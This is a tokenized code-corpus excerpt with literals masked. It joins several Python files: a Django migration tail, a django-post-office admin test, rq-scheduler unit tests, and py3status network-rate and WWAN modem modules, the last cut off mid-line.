b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) ] , default = '<STR_LIT>' , help_text = '<STR_LIT>' , max_length = <NUM_LIT:12> ) , <EOL> ) , <EOL> ] </s>
<s> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . test . client import Client <EOL> from django . test import TestCase <EOL> from post_office import mail <EOL> from post_office . models import Email <EOL> admin_username = '<STR_LIT>' <EOL> admin_email = '<STR_LIT>' <EOL> admin_pass = '<STR_LIT>' <EOL> class AdminViewTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> user = User . objects . create_superuser ( admin_username , admin_email , admin_pass ) <EOL> self . client = Client ( ) <EOL> self . client . login ( username = user . username , password = admin_pass ) <EOL> def test_admin_interface ( self ) : <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_admin_change_page ( self ) : <EOL> """<STR_LIT>""" <EOL> mail . send ( recipients = [ '<STR_LIT>' ] , headers = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> email = Email . objects . latest ( '<STR_LIT:id>' ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' , args = [ email . id ] ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) </s>
<s> import unittest <EOL> from datetime import datetime , timedelta <EOL> import os <EOL> import signal <EOL> import time <EOL> from threading import Thread <EOL> from rq import Queue <EOL> from rq . compat import as_text <EOL> from rq . job import Job <EOL> import warnings <EOL> from rq_scheduler import Scheduler <EOL> from rq_scheduler . utils import to_unix , from_unix , get_next_scheduled_time <EOL> from tests import RQTestCase <EOL> def say_hello ( name = None ) : <EOL> """<STR_LIT>""" <EOL> if name is None : <EOL> name = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( name , ) <EOL> def tl ( l ) : <EOL> return [ as_text ( i ) for i in l ] <EOL> def simple_addition ( x , y , z ) : <EOL> return x + y + z <EOL> class TestScheduler ( RQTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestScheduler , self ) . setUp ( ) <EOL> self . scheduler = Scheduler ( connection = self . testconn ) <EOL> def test_birth_and_death_registration ( self ) : <EOL> """<STR_LIT>""" <EOL> key = Scheduler . scheduler_key <EOL> self . assertNotIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> scheduler = Scheduler ( connection = self . testconn , interval = <NUM_LIT:20> ) <EOL> scheduler . register_birth ( ) <EOL> self . assertIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> self . assertEqual ( self . testconn . ttl ( key ) , <NUM_LIT:30> ) <EOL> self . assertFalse ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> self . assertRaises ( ValueError , scheduler . register_birth ) <EOL> scheduler . register_death ( ) <EOL> self . assertTrue ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> def test_create_job ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job , job_from_queue ) <EOL> self . assertEqual ( job_from_queue . func , say_hello ) <EOL> def test_create_job_with_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , ttl = <NUM_LIT:2> , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( <NUM_LIT:2> , job_from_queue . ttl ) <EOL> def test_create_job_with_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , id = '<STR_LIT>' , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT>' , job_from_queue . id ) <EOL> def test_create_job_with_description ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , description = '<STR_LIT:description>' , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT:description>' , job_from_queue . description ) <EOL> def test_job_not_persisted_if_commit_false ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , commit = False ) <EOL> self . assertEqual ( self . testconn . hgetall ( job . key ) , { } ) <EOL> def test_create_scheduled_job ( self ) : <EOL> """<STR_LIT>""" <EOL> scheduled_time = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( scheduled_time , say_hello ) <EOL> self . assertEqual ( job , Job . fetch ( job . id , connection = self . testconn ) ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( scheduled_time ) ) <EOL> def test_enqueue_in ( self ) : <EOL> """<STR_LIT>""" <EOL> right_now = datetime . utcnow ( ) <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , say_hello ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( right_now + time_delta ) ) <EOL> time_delta = timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , say_hello ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( right_now + time_delta ) ) <EOL> def test_get_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs ( now ) ) <EOL> future_time = now + timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_at ( future_time , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs ( timedelta ( hours = <NUM_LIT:1> , seconds = <NUM_LIT:1> ) ) ) <EOL> self . assertIn ( job , [ j [ <NUM_LIT:0> ] for j in self . scheduler . get_jobs ( with_times = True ) ] ) <EOL> self . assertIsInstance ( self . scheduler . get_jobs ( with_times = True ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , datetime ) <EOL> self . assertNotIn ( job , self . scheduler . get_jobs ( timedelta ( minutes = <NUM_LIT> , seconds = <NUM_LIT> ) ) ) <EOL> def test_get_jobs_to_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> future_time = now + timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_at ( future_time , say_hello ) <EOL> self . assertNotIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> def test_enqueue_job ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . utcnow ( ) <EOL> queue_name = '<STR_LIT:foo>' <EOL> scheduler = Scheduler ( connection = self . testconn , queue_name = queue_name ) <EOL> job = scheduler . enqueue_at ( now , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job , tl ( self . testconn . zrange ( scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:10> ) ) ) <EOL> job = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertTrue ( job . enqueued_at is not None ) <EOL> queue = scheduler . get_queue_for_job ( job ) <EOL> self . assertIn ( job , queue . jobs ) <EOL> queue = Queue . from_queue_key ( '<STR_LIT>' . format ( queue_name ) ) <EOL> self . assertIn ( job , queue . jobs ) <EOL> self . assertIn ( queue , Queue . all ( ) ) <EOL> def test_job_membership ( self ) : <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler ) <EOL> self . assertIn ( job . id , self . scheduler ) <EOL> self . assertNotIn ( "<STR_LIT>" , self . scheduler ) <EOL> def test_cancel_scheduled_job ( self ) : <EOL> """<STR_LIT>""" <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , say_hello ) <EOL> self . scheduler . cancel ( job ) <EOL> self . assertNotIn ( job . id , tl ( self . testconn . zrange ( <EOL> self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_change_execution_time ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , say_hello ) <EOL> new_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . scheduler . change_execution_time ( job , new_date ) <EOL> self . assertEqual ( to_unix ( new_date ) , <EOL> self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) ) <EOL> self . scheduler . cancel ( job ) <EOL> self . assertRaises ( ValueError , self . scheduler . change_execution_time , job , new_date ) <EOL> def test_args_kwargs_are_passed_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , z = <NUM_LIT:1> , y = <NUM_LIT:1> , x = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:x>' : <NUM_LIT:1> , '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , <NUM_LIT:1> , z = <NUM_LIT:1> , y = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , ) ) <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , z = <NUM_LIT:1> , y = <NUM_LIT:1> , x = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:x>' : <NUM_LIT:1> , '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , <NUM_LIT:1> , z = <NUM_LIT:1> , y = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , ) ) <EOL> def test_enqueue_is_deprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> job = self . scheduler . enqueue ( datetime . utcnow ( ) , say_hello ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertEqual ( w [ <NUM_LIT:0> ] . category , DeprecationWarning ) <EOL> def test_enqueue_periodic ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> job = self . scheduler . enqueue_periodic ( datetime . utcnow ( ) , <NUM_LIT:1> , None , say_hello ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertEqual ( w [ <NUM_LIT:0> ] . category , DeprecationWarning ) <EOL> def test_interval_and_repeat_persisted_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:10> , repeat = <NUM_LIT:11> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , <NUM_LIT:10> ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , <NUM_LIT:11> ) <EOL> def test_crontab_persisted_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> unix_time = self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) <EOL> datetime_time = from_unix ( unix_time ) <EOL> assert datetime_time . minute == <NUM_LIT:1> <EOL> assert datetime_time . second == <NUM_LIT:0> <EOL> assert datetime_time - datetime . utcnow ( ) < timedelta ( hours = <NUM_LIT:1> ) <EOL> def test_crontab_sets_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job_id = "<STR_LIT>" <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello , id = job_id ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_id , job_from_queue . id ) <EOL> def test_repeat_without_interval_raises_error ( self ) : <EOL> def create_job ( ) : <EOL> self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , repeat = <NUM_LIT:11> ) <EOL> self . assertRaises ( ValueError , create_job ) <EOL> def test_job_with_intervals_get_rescheduled ( self ) : <EOL> """<STR_LIT>""" <EOL> time_now = datetime . utcnow ( ) <EOL> interval = <NUM_LIT:10> <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( time_now ) + interval ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , None , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( time_now ) + interval ) <EOL> def test_job_with_crontab_get_rescheduled ( self ) : <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello ) <EOL> old_next_scheduled_time = self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) <EOL> job . meta [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertNotEqual ( old_next_scheduled_time , <EOL> self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) ) <EOL> expected_next_scheduled_time = to_unix ( get_next_scheduled_time ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> expected_next_scheduled_time ) <EOL> def test_job_with_repeat ( self ) : <EOL> """<STR_LIT>""" <EOL> time_now = datetime . utcnow ( ) <EOL> interval = <NUM_LIT:10> <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval , repeat = <NUM_LIT:1> ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval , repeat = <NUM_LIT:2> ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> time_now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , <NUM_LIT:1> , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , <NUM_LIT:2> , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_missing_jobs_removed_from_scheduler ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello ) <EOL> job . cancel ( ) <EOL> self . scheduler . get_jobs_to_queue ( ) <EOL> self . assertNotIn ( job . id , tl ( self . testconn . zrange ( <EOL> self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_periodic_jobs_sets_result_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job . result_ttl , - <NUM_LIT:1> ) <EOL> def test_periodic_jobs_sets_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , ttl = <NUM_LIT:4> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job . ttl , <NUM_LIT:4> ) <EOL> def test_periodic_job_sets_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , id = '<STR_LIT>' ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT>' , job . id ) <EOL> def test_periodic_job_sets_description ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , description = '<STR_LIT:description>' ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT:description>' , job . description ) <EOL> def test_run ( self ) : <EOL> """<STR_LIT>""" <EOL> def send_stop_signal ( ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> thread = Thread ( target = send_stop_signal ) <EOL> thread . start ( ) <EOL> self . assertRaises ( SystemExit , self . scheduler . run ) <EOL> thread . join ( ) <EOL> def test_scheduler_w_o_explicit_connection ( self ) : <EOL> """<STR_LIT>""" <EOL> s = Scheduler ( ) <EOL> self . assertEqual ( s . connection , self . testconn ) <EOL> def test_small_float_interval ( self ) : <EOL> """<STR_LIT>""" <EOL> key = Scheduler . scheduler_key <EOL> self . assertNotIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> scheduler = Scheduler ( connection = self . testconn , interval = <NUM_LIT:0.1> ) <EOL> self . assertEqual ( scheduler . _interval , <NUM_LIT:0.1> ) <EOL> scheduler . register_birth ( ) <EOL> self . assertIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> self . assertEqual ( self . testconn . ttl ( key ) , <NUM_LIT:10> ) <EOL> self . assertFalse ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> now = datetime . utcnow ( ) <EOL> job = scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> self . assertEqual ( len ( self . scheduler . get_jobs ( ) ) , <NUM_LIT:1> ) <EOL> scheduler . register_death ( ) <EOL> def send_stop_signal ( ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> thread = Thread ( target = send_stop_signal ) <EOL> thread . start ( ) <EOL> self . assertRaises ( SystemExit , scheduler . run ) <EOL> thread . join ( ) <EOL> self . assertEqual ( len ( scheduler . get_jobs ( ) ) , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from time import time <EOL> INITIAL_MULTI = <NUM_LIT> <EOL> MULTIPLIER_TOP = <NUM_LIT> <EOL> UNIT_MULTI = <NUM_LIT> <EOL> UNITS = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ] <EOL> class Py3status : <EOL> """<STR_LIT:U+0020>""" <EOL> all_interfaces = True <EOL> cache_timeout = <NUM_LIT:2> <EOL> devfile = '<STR_LIT>' <EOL> format = "<STR_LIT>" <EOL> format_no_connection = '<STR_LIT>' <EOL> hide_if_zero = False <EOL> interfaces = '<STR_LIT>' <EOL> interfaces_blacklist = '<STR_LIT>' <EOL> precision = <NUM_LIT:1> <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . last_interface = None <EOL> self . last_stat = self . _get_stat ( ) <EOL> self . last_time = time ( ) <EOL> def currentSpeed ( self , i3s_output_list , i3s_config ) : <EOL> if not isinstance ( self . interfaces , list ) : <EOL> self . interfaces = self . interfaces . split ( '<STR_LIT:U+002C>' ) <EOL> if not isinstance ( self . interfaces_blacklist , list ) : <EOL> self . interfaces_blacklist = self . interfaces_blacklist . split ( '<STR_LIT:U+002C>' ) <EOL> if self . precision > <NUM_LIT:0> : <EOL> self . left_align = len ( str ( MULTIPLIER_TOP ) ) + <NUM_LIT:1> + self . precision <EOL> else : <EOL> self . left_align = len ( str ( MULTIPLIER_TOP ) ) <EOL> self . value_format = "<STR_LIT>" % ( self . left_align , self . precision ) <EOL> ns = self . _get_stat ( ) <EOL> deltas = { } <EOL> try : <EOL> timedelta = time ( ) - self . last_time <EOL> for old , new in zip ( self . last_stat , ns ) : <EOL> down = int ( new [ <NUM_LIT:1> ] ) - int ( old [ <NUM_LIT:1> ] ) <EOL> up = int ( new [ <NUM_LIT:9> ] ) - int ( old [ <NUM_LIT:9> ] ) <EOL> down /= timedelta * INITIAL_MULTI <EOL> up /= timedelta * INITIAL_MULTI <EOL> deltas [ new [ <NUM_LIT:0> ] ] = { '<STR_LIT>' : up + down , '<STR_LIT>' : up , '<STR_LIT>' : down , } <EOL> self . last_stat = self . _get_stat ( ) <EOL> self . last_time = time ( ) <EOL> interface = max ( deltas , key = lambda x : deltas [ x ] [ '<STR_LIT>' ] ) <EOL> if deltas [ interface ] [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> interface = self . last_interface <EOL> hide = self . hide_if_zero <EOL> else : <EOL> self . last_interface = interface <EOL> hide = False <EOL> delta = deltas [ interface ] if interface else None <EOL> except TypeError : <EOL> delta = None <EOL> interface = None <EOL> hide = self . hide_if_zero <EOL> return { <EOL> '<STR_LIT>' : time ( ) + self . cache_timeout , <EOL> '<STR_LIT>' : "<STR_LIT>" if hide else <EOL> self . format . format ( <EOL> total = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> up = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> down = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> interface = interface [ : - <NUM_LIT:1> ] , <EOL> ) if interface else self . format_no_connection <EOL> } <EOL> def _get_stat ( self ) : <EOL> """<STR_LIT>""" <EOL> def dev_filter ( x ) : <EOL> x = x . strip ( ) . split ( "<STR_LIT:U+0020>" ) [ <NUM_LIT:0> ] [ : - <NUM_LIT:1> ] <EOL> if x in self . interfaces_blacklist : <EOL> return False <EOL> if self . all_interfaces : <EOL> return True <EOL> if x in self . interfaces : <EOL> return True <EOL> return False <EOL> x = filter ( dev_filter , open ( self . devfile ) . readlines ( ) [ <NUM_LIT:2> : ] ) <EOL> try : <EOL> return [ list ( filter ( lambda x : x , _x . split ( "<STR_LIT:U+0020>" ) ) ) for _x in x ] <EOL> except StopIteration : <EOL> return None <EOL> def _divide_and_format ( self , value ) : <EOL> """<STR_LIT>""" <EOL> for i , unit in enumerate ( UNITS ) : <EOL> if value > MULTIPLIER_TOP : <EOL> value /= UNIT_MULTI <EOL> else : <EOL> break <EOL> return self . value_format . format ( value = value , unit = unit ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> """<STR_LIT>""" <EOL> from time import sleep <EOL> x = Py3status ( ) <EOL> config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> while True : <EOL> print ( x . currentSpeed ( [ ] , config ) ) <EOL> sleep ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> import netifaces as ni <EOL> import os <EOL> import stat <EOL> import serial <EOL> from time import time , sleep <EOL> class Py3status : <EOL> baudrate = <NUM_LIT> <EOL> cache_timeout = <NUM_LIT:5> <EOL> consider_3G_degraded = False <EOL> format_down = '<STR_LIT>' <EOL> format_error = '<STR_LIT>' <EOL> format_no_service = '<STR_LIT>' <EOL> format_up = '<STR_LIT>' <EOL> interface = "<STR_LIT>" <EOL> modem = "<STR_LIT>" <EOL> modem_timeout = <NUM_LIT> <EOL> def wwan_status ( self , i3s_output_list , i3s_config ) : <EOL> query = "<STR_LIT>" <EOL> target_line = "<STR_LIT>" <EOL> if self . consider_3G_degraded : <EOL> degraded_netgen = <NUM_LIT:3> <EOL> else : <EOL> degraded_netgen = <NUM_LIT:2> <EOL> response = { } <EOL> response [ '<STR_LIT>' ] = time ( ) + self . cache_timeout <EOL> if os . path . exists ( self . modem ) and stat . S_ISCHR ( os . stat ( <EOL> self . modem ) . st_mode ) : <EOL> print ( "<STR_LIT>" + self . modem ) <EOL> try : <EOL> ser = serial . Serial ( <EOL> port = self . modem , <EOL> baudrate = self . baudrate , <EOL> parity = serial . PARITY_ODD , <EOL> stopbits = serial . STOPBITS_ONE , <EOL> bytesize = serial . EIGHTBITS ) <EOL> if ser . isOpen ( ) : <EOL> ser . close ( ) <EOL> ser . open ( ) <EOL> ser . write ( ( query + "<STR_LIT:\r>" ) . encode ( ) ) <EOL> print ( "<STR_LIT>" + self . modem 